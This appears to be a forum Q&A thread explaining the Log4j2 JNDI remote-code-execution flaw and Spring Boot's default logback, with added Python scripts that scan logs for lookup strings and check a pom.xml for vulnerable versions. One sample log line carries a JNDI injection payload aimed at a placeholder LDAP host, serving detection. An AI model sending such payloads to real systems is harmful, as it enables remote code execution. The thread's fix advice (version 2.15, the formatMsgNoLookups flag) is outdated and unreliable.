What is the Log4j2 vulnerability and Spring Boot?

Your thoughts?

|

Log4j is a logging framework for Java based applications. It's part of the Apache logging project and is used by millions of Java applications around the world.

Developers use the Log4J framework to easily log application level activity. Without logging, it's very difficult to understand what's going on in your application. This is why frameworks like Log4J are so widely used.

Spring Boot is a popular framework for configuring Java applications. By default, Spring Boot uses an alternative to log4j called logback. This is similar to Log4J but doesn't expose users to the key vulnerability introduced with Log4J...remote code execution (RCE).

RCE is as bad as it sounds. With remote code execution, attackers can run malicious code blocks without needing to authenticate or bypass any security measures.

This is possible because of "property substitution" where the Log4J library performs lookups to dynamically populate log statements. For example if you've ever seen something like this....

Getting Java runtime ${java:runtime}

you've seen substitution in action.

The log4j framework takes these ${} statements and performs lookups to populate the values. A JNDI lookup can be performed as one of these lookup options.

JNDI is a Java specific API for accessing different directory services like LDAP. Using JNDI, you can look up directories, classes, and other remote resources.

While this can be a cool tool for allowing flexibility in sharing and running Java applications, it presents a huge security vulnerability. Users can maliciously enter input that eventually gets logged by the system (thanks to log4j) and perform malicious lookups on remote LDAP servers.

This is the whole issue with Log4J because if an attacker makes an HTTP request with a ${jndi:} in the User-Agent header then the application server will log the HTTP headers and indirectly execute the malicious reference to a JNDI lookup resource....

It's important to remember that Spring Boot CAN use the Log4J2 implementation but BY DEFAULT does NOT. You have to explicitly configure Spring Boot to use Log4J.

With that said, plenty of tutorials and projects out there are using and recommending Log4J. This is why it's important to upgrade to at least >=2.15 if you are still using Log4J in your Spring Boot app.
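The answer above describes the attack path: a `${jndi:...}` lookup string arrives in a user-controlled field such as the User-Agent header, the server logs it, and Log4j resolves it. A defender's first question is usually "has anyone sent that to us?", so the following is an added example (not code from the thread or from the Log4j project) of a small scanner that runs over access-log lines and flags every `${...}` lookup expression it finds, rating `jndi` lookups as high severity. The log lines, the `.invalid` hostname and the `Finding` class are constructed for this example.

```python
import re
from dataclasses import dataclass

# Constructed sample lines in common access-log format (not taken from the thread).
# Line 2 carries a JNDI lookup in the User-Agent field, line 3 a harmless-looking
# non-JNDI lookup that is still worth flagging because no browser sends "${".
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 128 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /api HTTP/1.1" 200 64 "-" "curl/7.68.0 ${java:runtime}"',
]

# Any Log4j-style lookup expression: "${" up to the next "}".
LOOKUP_RE = re.compile(r"\$\{[^}]*\}")


@dataclass
class Finding:
    line_no: int   # 1-based index into the scanned input
    severity: str  # "high" for jndi lookups, "medium" for any other lookup
    lookup: str    # the matched ${...} text


def classify(lookup: str) -> str:
    """Rate a matched lookup: jndi lookups are the RCE path, others are suspicious."""
    return "high" if "jndi" in lookup.lower() else "medium"


def scan(lines) -> list:
    """Return one Finding per ${...} expression found in the given log lines."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for match in LOOKUP_RE.finditer(line):
            text = match.group(0)
            findings.append(Finding(line_no, classify(text), text))
    return findings


def has_high_severity(findings) -> bool:
    """True if at least one finding is a jndi lookup."""
    return any(f.severity == "high" for f in findings)


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG_LINES):
        print(f"line {f.line_no}: {f.severity:6s} {f.lookup}")
```

The scanner deliberately flags every lookup, not only `jndi`, because legitimate clients never put Log4j substitution syntax into request headers; anything matching `${` in user-supplied input is worth a look, and the `jndi` hits are the ones to treat as an incident. Point `scan()` at real log lines (for example `scan(open(path))`) to use it on an actual server.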

|

Basically the log4j framework allows attackers to inject malicious code via JNDI lookups and user input...a really easy fix for it is to upgrade to log4j >= 2.15 or...

 log4j2.formatMsgNoLookups=true


|

If you use log4J2 with Spring Boot...then there is potentially an issue for you to fix. If you use the default logging implementation (logback) or another alternative like java.util.logging then you have nothing to worry about.
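The answers above turn on one fact: whether your Spring Boot project actually pulls in Log4j2, and if so at what version. As an added example (not code from the thread or from Spring Boot), here is a small check that reads a Maven `pom.xml`, reports whether `spring-boot-starter-log4j2` or `log4j-core` is declared, and compares any explicit `log4j-core` version against the `>= 2.15` figure the thread gives. The `pom.xml` content is constructed for this example, and `MIN_SAFE` is a parameter you should set to whatever your current policy requires.

```python
import re
import xml.etree.ElementTree as ET

# Constructed pom.xml fragment (not from the thread): a Spring Boot project that
# swaps the default logback starter for the log4j2 starter and pins an old log4j-core.
SAMPLE_POM = """<project xmlns="http://maven.apache.org/POM/4.0.0">
  <dependencies>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-web</artifactId>
      <exclusions>
        <exclusion>
          <groupId>org.springframework.boot</groupId>
          <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
      </exclusions>
    </dependency>
    <dependency>
      <groupId>org.springframework.boot</groupId>
      <artifactId>spring-boot-starter-log4j2</artifactId>
    </dependency>
    <dependency>
      <groupId>org.apache.logging.log4j</groupId>
      <artifactId>log4j-core</artifactId>
      <version>2.14.1</version>
    </dependency>
  </dependencies>
</project>"""

NS = {"m": "http://maven.apache.org/POM/4.0.0"}
LOG4J_ARTIFACTS = {"spring-boot-starter-log4j2", "log4j-core"}
MIN_SAFE = (2, 15, 0)  # the thread's ">= 2.15" advice; adjust to current policy


def parse_version(text: str) -> tuple:
    """Turn '2.15' or '2.14.1' into a comparable 3-tuple, padding with zeros."""
    parts = [int(p) for p in re.findall(r"\d+", text)][:3]
    parts += [0] * (3 - len(parts))
    return tuple(parts)


def declared_dependencies(root):
    """Yield (artifactId, version-or-None) for every <dependency> in the pom."""
    for dep in root.findall(".//m:dependency", NS):
        artifact = dep.findtext("m:artifactId", namespaces=NS)
        version = dep.findtext("m:version", namespaces=NS)
        yield artifact, version


def assess(pom_text: str) -> dict:
    """Report whether the project uses log4j2 and whether log4j-core needs upgrading."""
    root = ET.fromstring(pom_text)
    deps = dict(declared_dependencies(root))
    uses_log4j2 = any(a in deps for a in LOG4J_ARTIFACTS)
    core_version = deps.get("log4j-core")
    if not uses_log4j2:
        needs_upgrade = False            # logback (or another impl) is in use
    elif core_version is None:
        needs_upgrade = None             # version managed by the parent BOM; unknown here
    else:
        needs_upgrade = parse_version(core_version) < MIN_SAFE
    return {
        "uses_log4j2": uses_log4j2,
        "log4j_core_version": core_version,
        "needs_upgrade": needs_upgrade,
    }


if __name__ == "__main__":
    print(assess(SAMPLE_POM))
```

A `needs_upgrade` of `None` means the log4j2 starter is present but `log4j-core` is version-managed by the Spring Boot parent, so the effective version has to be read from `mvn dependency:tree` rather than from the pom itself; that is the common case in Spring Boot projects and the one this check cannot settle on its own.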

|

Spring Boot uses logback by default...chill :)